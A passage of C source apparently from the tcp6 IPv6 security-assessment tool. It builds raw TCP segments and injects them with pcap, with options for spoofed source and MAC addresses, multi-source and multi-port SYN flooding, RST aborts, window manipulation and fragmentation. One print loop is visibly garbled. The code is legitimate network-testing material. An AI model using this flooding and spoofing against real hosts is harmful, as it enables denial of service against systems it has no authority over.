tcp->th_dport= pkt_tcp->th_sport; if(tcpseq_f) tcp->th_seq= htonl(tcpseq); else tcp->th_seq = pkt_tcp->th_ack; if( pkt_tcp->th_flags & TH_SYN){ if(tcpopen_f){ if(tcpopen == OPEN_PASSIVE){ /* If it is a pure SYN, respond with a SYN/ACK */ if(!(pkt_tcp->th_flags & TH_ACK)){ tcp->th_flags = tcp->th_flags | TH_SYN | TH_ACK; tcp->th_seq= random(); tcp->th_ack= htonl(ntohl(pkt_tcp->th_seq) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } else if(tcpopen == OPEN_SIMULTANEOUS){ /* If it is a pure SYN, respond with a SYN */ if(!(pkt_tcp->th_flags & TH_ACK)){ tcp->th_flags = tcp->th_flags | TH_SYN; tcp->th_seq= random(); tcp->th_ack= 0; } else{ /* If we receive a SYN/ACK (product of the above SYN), send a SYN/ACK */ tcp->th_flags = tcp->th_flags | TH_SYN | TH_ACK; tcp->th_seq= (pkt_tcp->th_ack) - (rhbytes + 1); tcp->th_ack= htonl(ntohl(pkt_tcp->th_seq) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); if(data_f) senddata_f= 1; } } else if(tcpopen == OPEN_ABORT){ /* If we receive a SYN, send RST */ tcp->th_flags = tcp->th_flags | TH_RST | TH_ACK; if(pkt_tcp->th_flags & TH_ACK) tcp->th_seq= pkt_tcp->th_ack; else tcp->th_seq= 0; tcp->th_ack= htonl(ntohl(pkt_tcp->th_seq) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } else{ /* We have received a SYN/ACK */ if(pkt_tcp->th_flags & TH_ACK){ /* It's a SYN/ACK, and we are doing an active open */ if(tcpack_f){ tcp->th_ack= htonl(tcpack); } else{ if( !tcpflags_f || (tcpflags_f && (tcpflags & TH_ACK))){ tcp->th_ack= pkt_tcp->th_seq; if(ackdata_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); } if(ackflags_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } } if(tcpflags_f){ tcp->th_flags= tcpflags; } else{ tcp->th_flags= TH_ACK; /* If the incoming packet was a SYN, we should respond with a SYN/ACK */ if( (pkt_tcp->th_flags & TH_SYN) && !(pkt_tcp->th_flags & TH_ACK)) tcp->th_flags = tcp->th_flags | TH_SYN; } if(data_f) senddata_f= 1; if(tcpclose_f && tcpclose != CLOSE_FIN_WAIT_2 && tcpclose != CLOSE_PASSIVE) startclose_f= 1; } else{ /* Simple SYN segment */ if(tcpack_f){ tcp->th_ack= htonl(tcpack); } else{ if( !tcpflags_f || (tcpflags_f && (tcpflags & TH_ACK))){ tcp->th_ack= pkt_tcp->th_seq; if(ackdata_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); } if(ackflags_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } } if(tcpflags_f){ tcp->th_flags= tcpflags; } else{ tcp->th_flags= TH_ACK; /* If the incoming packet was a SYN, we should respond with a SYN/ACK */ if( (pkt_tcp->th_flags & TH_SYN) && !(pkt_tcp->th_flags & TH_ACK)) tcp->th_flags = tcp->th_flags | TH_SYN; } } } tcp->th_win= htons(tcpwin); } else if(pkt_tcp->th_flags & TH_FIN){ if(tcpclose_f && (tcpclose == CLOSE_SIMULTANEOUS || tcpclose == CLOSE_PASSIVE || tcpclose == CLOSE_ABORT)){ if(tcpclose == CLOSE_SIMULTANEOUS){ tcp->th_flags = TH_ACK | TH_FIN; tcp->th_seq= pkt_tcp->th_ack; tcp->th_ack= pkt_tcp->th_seq; } else if(tcpclose == CLOSE_PASSIVE){ tcp->th_flags = TH_ACK | TH_FIN; tcp->th_seq= pkt_tcp->th_ack; tcp->th_ack= htonl(ntohl(pkt_tcp->th_seq) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } else if(tcpclose == CLOSE_ABORT){ tcp->th_flags = TH_ACK | TH_RST; tcp->th_seq= pkt_tcp->th_ack; tcp->th_ack= htonl(ntohl(pkt_tcp->th_seq) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } else{ if(tcpflags_f){ tcp->th_flags= tcpflags; } else{ tcp->th_flags= TH_ACK; } if(tcpack_f){ tcp->th_ack= htonl(tcpack); } else{ if( !tcpflags_f || (tcpflags_f && (tcpflags & TH_ACK))){ tcp->th_ack= pkt_tcp->th_seq; if(ackdata_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); } if(ackflags_f && !(tcpclose_f && tcpclose == CLOSE_LAST_ACK) && !(tcpclose_f && tcpclose == CLOSE_FIN_WAIT_1)){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } } } if(window_f){ if(window == WIN_CLOSED){ tcp->th_win= htons(0); } else if(window == WIN_MODULATE){ tcp->th_win= htons(tcpwinm); } } else tcp->th_win= htons(tcpwin); } else if(pkt_tcp->th_flags & TH_ACK){ if(tcpclose_f && tcpclose == CLOSE_ABORT){ tcp->th_flags = TH_ACK | TH_RST; tcp->th_seq= pkt_tcp->th_ack; tcp->th_ack= htonl(ntohl(pkt_tcp->th_seq) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } else{ if(tcpflags_f){ tcp->th_flags= tcpflags; } else{ tcp->th_flags= TH_ACK; } if(tcpack_f){ tcp->th_ack= htonl(tcpack); } else{ if( !tcpflags_f || (tcpflags_f && (tcpflags & TH_ACK))){ tcp->th_ack= pkt_tcp->th_seq; if(ackdata_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); } if(ackflags_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } } } if(window_f){ if(window == WIN_CLOSED){ tcp->th_win= htons(0); } else if(window == WIN_MODULATE){ tcp->th_win= htons(tcpwinm); } } else tcp->th_win= htons(tcpwin); } tcp->th_urp= htons(tcpurg); /* Current version of tcp6 does not support sending TCP options */ tcp->th_off= sizeof(struct tcp_hdr) >> 2; ptr+= tcp->th_off << 2; if(rhbytes){ if( (ptr + rhbytes) > v6buffer+ idata->max_packet_size){ puts("Packet Too Large while inserting TCP segment"); exit(EXIT_FAILURE); } while(rhbytes>=4){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); rhbytes -= sizeof(u_int32_t); } while(rhbytes>0){ *(u_int8_t *) ptr= (u_int8_t) random(); ptr++; rhbytes--; } } tcp->th_sum = 0; tcp->th_sum = in_chksum(v6buffer, tcp, ptr-((unsigned char *)tcp), IPPROTO_TCP); frag_and_send(idata); if(senddata_f){ tcp->th_seq= htonl( ntohl(tcp->th_seq) + ptr-((unsigned char *)tcp + (tcp->th_off << 2))); ptr= (unsigned char *)tcp + sizeof(struct tcp_hdr); if((ptr+ datalen) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting TCP data"); exit(EXIT_FAILURE); } memcpy(ptr, data, datalen); ptr+= datalen; if(window_f){ if(window == WIN_CLOSED) tcp->th_win = htons(0); else tcp->th_win = htons((u_int16_t) win1_size); } else{ tcp->th_win = htons(tcpwin); } tcp->th_sum = 0; tcp->th_sum = in_chksum(v6buffer, tcp, ptr-((unsigned char *)tcp), IPPROTO_TCP); frag_and_send(idata); } if(startclose_f){ tcp->th_seq= htonl( ntohl(tcp->th_seq) + ptr-((unsigned char *)tcp + (tcp->th_off << 2))); ptr= (unsigned char *) tcp + sizeof(struct tcp_hdr); if(tcpclose == CLOSE_ABORT){ tcp->th_flags= TH_ACK | TH_RST; } else if(tcpclose == CLOSE_ACTIVE || tcpclose == CLOSE_LAST_ACK){ tcp->th_flags= TH_ACK | TH_FIN; } tcp->th_sum = 0; tcp->th_sum = in_chksum(v6buffer, tcp, ptr-((unsigned char *)tcp), IPPROTO_TCP); frag_and_send(idata); } return; } else{ if(ports >= nports){ sources++; ports= 0; } if(sources >= nsources){ if(loop_f){ sources= 0; } else{ donesending_f= 1; return; } } if( (ptr+sizeof(struct tcp_hdr)) > (v6buffer + idata->max_packet_size)){ puts("Packet Too Large while inserting TCP header"); exit(EXIT_FAILURE); } tcp= (struct tcp_hdr *) ptr; bzero(ptr, sizeof(struct tcp_hdr)); tcp->th_sport= htons(srcport); tcp->th_dport= htons(dstport); tcp->th_seq = htonl(tcpseq); if(tcpack_f || (tcpflags & TH_ACK)) tcp->th_ack= htonl(tcpack); else tcp->th_ack= 0; if(tcpflags_auto_f || tcpopen_f || tcpclose_f){ tcp->th_flags= TH_SYN; } else{ tcp->th_flags= tcpflags; } tcp->th_urp= htons(tcpurg); tcp->th_win= htons(tcpwin); tcp->th_off= sizeof(struct tcp_hdr) >> 2; ptr += tcp->th_off << 2; if( (ptr + rhbytes) > v6buffer + idata->max_packet_size){ puts("Packet Too Large while inserting TCP segment"); exit(EXIT_FAILURE); } while(rhbytes>=4){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); rhbytes -= sizeof(u_int32_t); } while(rhbytes>0){ *(u_int8_t *) ptr= (u_int8_t) random(); ptr++; rhbytes--; } if(pktdata == NULL && (floods_f && ports == 0)){ /* Randomizing the IPv6 Source address based on the prefix specified by "srcaddr" and srcpreflen. */ randomize_ipv6_addr( &(ipv6->ip6_src), &(idata->srcaddr), idata->srcpreflen); /* If we need to respond to incomming packets, we set the Interface ID such that we can detect which IPv6 addresses we have used. */ if(listen_f && useaddrkey_f){ ipv6->ip6_src.s6_addr16[4]= random(); ipv6->ip6_src.s6_addr16[5]= ipv6->ip6_src.s6_addr16[4] ^ addr_key; ipv6->ip6_src.s6_addr16[6]= random(); ipv6->ip6_src.s6_addr16[7]= ipv6->ip6_src.s6_addr16[6] ^ addr_key; } if(idata->type == DLT_EN10MB && idata->flags != IFACE_LOOPBACK && !(idata->hsrcaddr_f)){ for(i=0; i<6; i++) ethernet->src.a[i]= random(); } } if(pktdata == NULL && floodp_f){ tcp->th_sport= random(); } tcp->th_sum = 0; tcp->th_sum = in_chksum(v6buffer, tcp, ptr-((unsigned char *)tcp), IPPROTO_TCP); frag_and_send(idata); if(pktdata == NULL) ports++; return; } } /* * Function: frag_and_send() * * Send an IPv6 datagram, and fragment if selected */ void frag_and_send(struct iface_data *idata){ if(!fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + idata->linkhsize); fptrend = fptr + idata->linkhsize+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - idata->linkhsize); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } /* Sending fragments */ } /* Sending fragmented datagram */ } /* * Function: usage() * * Prints the syntax of the tcp6 tool */ void usage(void){ puts("usage: tcp6 -i INTERFACE [-S LINK_SRC_ADDR] [-D LINK-DST-ADDR] " "[-s SRC_ADDR[/LEN]] [-d DST_ADDR] [-A HOP_LIMIT] [-y FRAG_SIZE] [-u DST_OPT_HDR_SIZE] " "[-U DST_OPT_U_HDR_SIZE] [-H HBH_OPT_HDR_SIZE] [-P PAYLOAD_SIZE] [-o SRC_PORT] " "[-a DST_PORT] [-X TCP_FLAGS] [-q TCP_SEQ] [-Q TCP_ACK] [-V TCP_URP] [-w TCP_WIN] " "[-N] [-f] [-j PREFIX[/LEN]] [-k PREFIX[/LEN]] [-J LINK_ADDR] [-K LINK_ADDR] " "[-b PREFIX[/LEN]] [-g PREFIX[/LEN]] [-B LINK_ADDR] [-G LINK_ADDR] " "[-F N_SOURCES] [-T N_PORTS] [-L | -l] [-z SECONDS] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the tcp6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts( "tcp6: Security assessment tool for attack vectors based on TCP/IPv6 packets\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -A IPv6 Hop Limit\n" " --frag-hdr. -y Fragment Header\n" " --dst-opt-hdr, -u Destination Options Header (Fragmentable Part)\n" " --dst-opt-u-hdr, -U Destination Options Header (Unfragmentable Part)\n" " --hbh-opt-hdr, -H Hop by Hop Options Header\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --payload-size, -P TCP Payload Size\n" " --src-port, -o TCP Source Port\n" " --dst-port, -a TCP Destination Port\n" " --tcp-flags, -X TCP Flags\n" " --tcp-seq, -q TCP Sequence Number\n" " --tcp-ack, -Q TCP Acknowledgment Number\n" " --tcp-urg, -V TCP Urgent Pointer\n" " --tcp-win, -w TCP Window\n" " --not-ack-data, -N Do not acknowledge the TCP payload\n" " --not-ack-flags, -f Do not acknowledge the TCP flags\n" " --block-src, -j Block IPv6 Source Address prefix\n" " --block-dst, -k Block IPv6 Destination Address prefix\n" " --block-link-src, -J Block Ethernet Source Address\n" " --block-link-dst, -K Block Ethernet Destination Address\n" " --accept-src, -b Accept IPv6 Source Addres prefix\n" " --accept-dst, -g Accept IPv6 Destination Address prefix\n" " --accept-link-src, -B Accept Ethernet Source Address\n" " --accept-link-dst, -G Accept Ethernet Destination Address\n" " --flood-sources, -F Flood from multiple IPv6 Source Addresses\n" " --flood-ports, -T Flood from multiple TCP Source Ports\n" " --listen, -L Listen to incoming packets\n" " --loop, -l Send periodic TCP segments\n" " --sleep, -z Pause between sending TCP segments\n" " --help, -h Print help for the tcp6 tool\n" " --verbose, -v Be verbose\n" "\n" "Programmed by Fernando Gont for SI6 Networks \n" "Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ puts( "tcp6: Security assessment tool for attack vectors based on TCP/IPv6 packets\n"); if(floods_f) printf("Flooding the target from %u different IPv6 Source Addresses\n", nsources); if(floodp_f) printf("Flooding the target from %u different TCP ports\n", nports); if(idata->type == DLT_EN10MB && idata->flags != IFACE_LOOPBACK){ if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else{ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!(idata->hsrcaddr_f))?" (randomized)":"")); } else puts("Ethernet Source Address: Automatically selected for each packet"); } /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s\n", plinkaddr); } } if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f){ if(idata->dstaddr_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!(idata->srcaddr_f))?" (randomized)":"")); } } else{ printf("IPv6 Source Address: randomized, from the %s/%u prefix%s\n", psrcaddr, idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); } if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; idstaddr_f){ if(!floodp_f || (floodp_f && nports ==1)){ printf("Source Port: %u%s\t", srcport, (srcport_f?"":" (randomized)")); } else{ printf("Source Port: (randomized)\t"); } printf("Destination Port: %u%s\n", dstport, (dstport_f?"":" (randomized)")); if( (floods_f || floodp_f) && (nsources != 1 || nports != 1)){ printf("SEQ Number: (randomized)\t"); } else{ printf("SEQ Number: %u%s\t", tcpseq, (tcpseq_f?"":" (randomized)")); } printf("ACK Number: %u%s\n", tcpack, (tcpack_f?"":" (randomized)")); if(tcpflags_f){ printf("Flags: %s%s%s%s%s%s%s%s\t", ((tcpflags & TH_FIN)?"F":""), ((tcpflags & TH_SYN)?"S":""), \ ((tcpflags & TH_RST)?"R":""), ((tcpflags & TH_PUSH)?"P":""),\ ((tcpflags & TH_ACK)?"A":""), ((tcpflags & TH_URG)?"U":""),\ ((!tcpflags)?"none":""), ((!tcpflags_f)?" (default)":"")); } else{ printf("Flags: Auto\t"); } if(window_f){ printf("Window (initial): %u%s\t", tcpwin, (tcpwin_f?"":" (randomized)")); if(window == WIN_CLOSED) printf("Window: Closed\n"); else if(window == WIN_MODULATE) printf("\nWindow: Modulated (%u byte%s (%u second%s), %u byte%s (%u second%s))\n",\ win1_size, ((win1_size>1)?"s":""), time1_len, ((time1_len>1)?"s":""), \ win2_size, ((win2_size>1)?"s":""), time2_len, ((time2_len>1)?"s":"")); } else{ printf("Window: %u%s\t", tcpwin, (tcpwin_f?"":" (randomized)")); } printf("URG Pointer: %u%s\n", tcpurg, (tcpurg_f?"":" (default)")); } else{ printf("Source Port: Auto\tDestination Port: Auto\n"); if(tcpseq_f){ printf("SEQ Number: %u\t", tcpseq); } else{ printf("SEQ Number: Auto\t"); } if(tcpack_f){ printf("ACK Number: %u\n", tcpack); } else{ printf("ACK Number: Auto\n"); } if(tcpflags_f){ printf("Flags: %s%s%s%s%s%s%s\t", ((tcpflags & TH_FIN)?"F":""), ((tcpflags & TH_SYN)?"S":""), \ ((tcpflags & TH_RST)?"R":""), ((tcpflags & TH_PUSH)?"P":""),\ ((tcpflags & TH_ACK)?"A":""), ((tcpflags & TH_URG)?"U":""),\ ((!tcpflags)?"none":"")); } else{ printf("Flags: Auto\t"); } if(window_f){ printf("Window (initial): %u%s\t", tcpwin, (tcpwin_f?"":" (randomized)")); if(window == WIN_CLOSED) printf("Window: Closed\n"); else if(window == WIN_MODULATE) printf("\nWindow: Modulated (%u byte%s (%u second%s), %u byte%s (%u second%s))\n",\ win1_size, ((win1_size>1)?"s":""), time1_len, ((time1_len>1)?"s":""), \ win2_size, ((win2_size>1)?"s":""), time2_len, ((time2_len>1)?"s":"")); } else{ printf("Window: %u%s\n", tcpwin, (tcpwin_f?"":" (randomized)")); } } } /* * Function: queue_data() * * Puts data into a queue */ unsigned int queue_data(struct queue *q, unsigned char *data, unsigned int nbytes){ unsigned int fbytes, nleft; /* We have to scenarios: in >= out and in < out In the first scenario, the circular buffer may be "split in two". In the second one, all available space is clustered together. */ if(q->in >= q->out){ fbytes= (q->data+ q->size) - q->in -1; fbytes= fbytes+ (q->out - q->data); if(nbytes > fbytes) nbytes= fbytes; /* There is enough space available on the right side of the buffer */ if( (q->data + q->size - q->in) >= nbytes){ memcpy(q->in, data, nbytes); q->in= q->in + nbytes; if(q->in == (q->data + q->size)) q->in= q->data; return(nbytes); } else{ nleft= nbytes; memcpy(q->in, data, (q->data + q->size - q->in)); nleft= nleft - (q->data + q->size - q->in); q->in= q->data; memcpy(q->in, data, nleft); return(nbytes); } } else{ fbytes= q->out - q->in - 1; if(nbytes > fbytes) nbytes= fbytes; memcpy(q->in, data, nbytes); q->in= q->in + nbytes; if(q->in == (q->data + q->size)) q->in= q->data; return(nbytes); } /* Should never reach here, but avoid compiler warnings */ return(0); } /* * Function: dequeue_data() * * Reads data from a queue */ unsigned int dequeue_data(struct queue *q, unsigned char *data, unsigned int nbytes){ unsigned int dbytes, nleft; /* We have to scenarios: out > in and out <= in In the first scenario, the circular buffer may be "split in two". In the second one, all available data are clustered together. */ if(q->out > q->in){ dbytes= (q->data+ q->size) - q->out; dbytes= dbytes+ (q->in - q->out); if(nbytes > dbytes) nbytes= dbytes; /* There is enough data available on the right side of the buffer */ if( (q->data + q->size - q->out) >= nbytes){ memcpy(data, q->out, nbytes); q->out= q->out + nbytes; if(q->out == (q->data + q->size)) q->out= q->data; return(nbytes); } else{ /* Data are split in two parts */ nleft= nbytes; memcpy(data, q->out, (q->data + q->size - q->out)); data= data+ (q->data + q->size - q->out); nleft= nleft - (q->data + q->size - q->out); q->out= q->data; memcpy(data, q->out, nleft); q->out= q->out + nleft; return(nbytes); } } else{ dbytes= q->in - q->out; if(nbytes > dbytes) nbytes= dbytes; memcpy(data, q->out, nbytes); q->out= q->out + nbytes; if(q->out == (q->data + q->size)) q->out= q->data; return(nbytes); } /* Should never reach here, but avoid compiler warnings */ return(0); } /* * Function: queue_copy() * * Copies data from queue, without removing it */ unsigned int queue_copy(struct queue *q, unsigned char *org, unsigned int offset, unsigned char *data, unsigned int nbytes){ unsigned int dbytes, nleft; if(org+offset >= (q->data + q->size)){ org= q->data + offset - (q->data + q->size - org); } /* | in out We have to scenarios: out > in and out <= in In the first scenario, the circular buffer may be "split in two". In the second one, all available data are clustered together. */ if(org > q->in){ dbytes= (q->data+ q->size) - org; dbytes= dbytes+ (q->in - org); if(nbytes > dbytes) nbytes= dbytes; /* There is enough data available on the right side of the buffer */ if( (q->data + q->size - org) >= nbytes){ memcpy(data, org, nbytes); return(nbytes); } else{ /* Data are split in two parts */ nleft= nbytes; memcpy(data, org, (q->data + q->size - org)); data= data + (q->data + q->size - org); nleft= nleft - (q->data + q->size - org); org= q->data; memcpy(data, org, nleft); return(nbytes); } } else{ dbytes= q->in - org; if(nbytes > dbytes) nbytes= dbytes; memcpy(data, org, nbytes); return(nbytes); } /* Should never reach here, buts avoid compiler warnings */ return(0); } /* * Function: queue_remove() * * Discards data from queue * Note: This function is employed to discard data from the TCP send buffer when they are ACKed * by the remote TCP endpoint. */ unsigned int queue_remove(struct queue *q, unsigned char *data, unsigned int nbytes){ unsigned int dbytes, nleft; /* We have to scenarios: out > in and out <= in In the first scenario, the circular buffer may be "split in two". In the second one, all available data are clustered together. */ if(q->out > q->in){ dbytes= (q->data+ q->size) - q->out; dbytes= dbytes+ (q->in - q->out); if(nbytes > dbytes) nbytes= dbytes; /* There is enough data available on the right side of the buffer */ if( (q->data + q->size - q->out) >= nbytes){ q->out= q->out + nbytes; if(q->out == (q->data + q->size)) q->out= q->data; return(nbytes); } else{ /* Data are split in two parts */ nleft= nbytes; data= data+ (q->data + q->size - q->out); nleft= nleft - (q->data + q->size - q->out); q->out= q->data; q->out= q->out + nleft; return(nbytes); } } else{ dbytes= q->in - q->out; if(nbytes > dbytes) nbytes= dbytes; memcpy(data, q->out, nbytes); q->out= q->out + nbytes; if(q->out == (q->data + q->size)) q->out= q->data; return(nbytes); } /* Should never reach here, but avoid compiler warnings */ return(0); } /* * Function: tcp_init() * * Initilizes a TCP structure */ int tcp_init(struct tcp *tcp){ memset(&(tcp->srcaddr), 0, sizeof(struct in6_addr)); memset(&(tcp->dstaddr), 0, sizeof(struct in6_addr)); tcp->srcport= 0; tcp->dstport= 0; tcp->in.in = tcp->in.data; tcp->in.out= tcp->in.data; tcp->in.size= sizeof(tcp->in.data); tcp->rcv_nxt= 0; tcp->rcv_nxtwnd= 0; tcp->out.in= tcp->out.data; tcp->out.out= tcp->out.data; tcp->out.size= sizeof(tcp->out.data); tcp->out_una= tcp->out.data; tcp->out_nxt= tcp->out.data; tcp->snd_una=0; tcp->snd_nxtwnd=0; memset(&(tcp->time), 0, sizeof(struct timeval)); tcp->state= TCP_CLOSED; tcp->ack= 0; tcp->win= sizeof(tcp->in.data) - 1; return(SUCCESS); } /* * Function: tcp_open() * * Performs an open (active or passive) on a TCP socket */ int tcp_open(struct iface_data *idata, struct tcp *tcb, unsigned int mode){ if(mode == OPEN_ACTIVE){ tcb->state= TCP_SYN_SENT; tcb->flags= TH_SYN; tcb->snd_una= random(); tcb->snd_nxt= tcb->snd_una + 1; tcb->pending_write_f= TRUE; return(SUCCESS); } else if(mode == OPEN_PASSIVE){ tcb->state= TCP_LISTEN; return(SUCCESS); } return(FAILURE); } /* * Function: tcp_close() * * Performs a close on a TCP socket */ int tcp_close(struct iface_data *idata, struct tcp *tcb){ tcb->fin_flag= TRUE; tcb->fin_seq= tcb->snd_nxt; tcb->pending_write_f= TRUE; return(SUCCESS); } /* * Function: tcp_send() * * Sends data over TCP (actually copies it to the TCP send buffer) */ int tcp_send(struct iface_data *idata, struct tcp *tcb, unsigned char *data, unsigned int nbytes){ if(tcb->fin_flag == TRUE) return(-1); else return(queue_data( &(tcb->out), data, nbytes)); } /* * Function: tcp_receive() * * Receive data from a TCP socket */ int tcp_receive(struct iface_data *idata, struct tcp *tcb, unsigned char *data, unsigned int nbytes){ unsigned int r; r= dequeue_data(&(tcb->in), data, nbytes); if(r > 0) tcb->pending_write_f= TRUE; return(r); } /* * Function: tcp_input() * * Processes an incoming TCP segment */ int tcp_input(struct iface_data *idata, struct tcp *tcb, const u_char *pktdata, struct pcap_pkthdr *pkthdr, struct packet *packet){ return(SUCCESS); } /* * Function: tcp_output() * * Sends TCP segments as necessary */ int tcp_output(struct iface_data *idata, struct tcp *tcb, struct packet *packet, struct timeval *curtime){ /* Placeholder */ return(SUCCESS); } /* * Function: is_valid_tcp_segment() * * Performs sanity checks on an incomming TCP/IPv6 segment */ int is_valid_tcp_segment(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr *pkthdr){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct tcp_hdr *pkt_tcp; unsigned char *pkt_end; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_tcp = (struct tcp_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* XXX: We are assuming no extension headers on incoming packets -- this should be improved! */ /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_tcp + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_tcp + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain a TCP header */ if( (pkt_end - (unsigned char *) pkt_tcp) < sizeof(struct tcp_hdr)){ return FALSE; } /* Check that the TCP checksum is correct */ if(in_chksum(pkt_ipv6, pkt_tcp, pkt_end-((unsigned char 